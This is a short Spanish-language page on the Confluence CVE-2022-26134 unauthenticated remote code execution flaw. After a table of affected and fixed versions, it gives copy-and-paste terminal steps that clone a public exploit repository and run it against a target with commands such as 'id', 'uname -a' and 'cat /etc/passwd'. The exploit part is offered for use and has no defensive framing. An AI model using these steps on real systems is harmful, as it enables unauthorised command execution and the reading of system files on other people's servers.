
Atlassian Confluence (CVE-2022-26134) - Ejecución remota de código no autenticada (RCE)
Confluence Server y Data Center - CVE-2022-26134 - Vulnerabilidad crítica de ejecución remota de código sin autenticación
| Resumen | CVE-2022-26134 - Vulnerabilidad crítica de ejecución remota de código sin autenticación en Confluence Server y Data Center |
|---|---|
| Productos afectados | Confluence Confluence Server Confluence Data Center |
| Versiones afectadas | Todas las versiones compatibles de Confluence Server y Data Center están afectadas. Las versiones de Confluence Server y Data Center posteriores a 1.3.0 están afectadas. |
| Versiones corregidas | 7.4.17 7.13.7 7.14.3 7.15.2 7.16.4 7.17.4 7.18.1 |
Copiar y pegar en la terminal:
git clone https://github.com/nxtexploit/CVE-2022-26134 ; cd CVE-2022-26134 ; pip install -r requirements.txt
python3 CVE-2022-26134.py https://target.com type-command-here
python3 CVE-2022-26134.py https://target.com "uname -a"
python3 CVE-2022-26134.py https://target.com "cat /etc/passwd"
python3 CVE-2022-26134.py https://target.com id
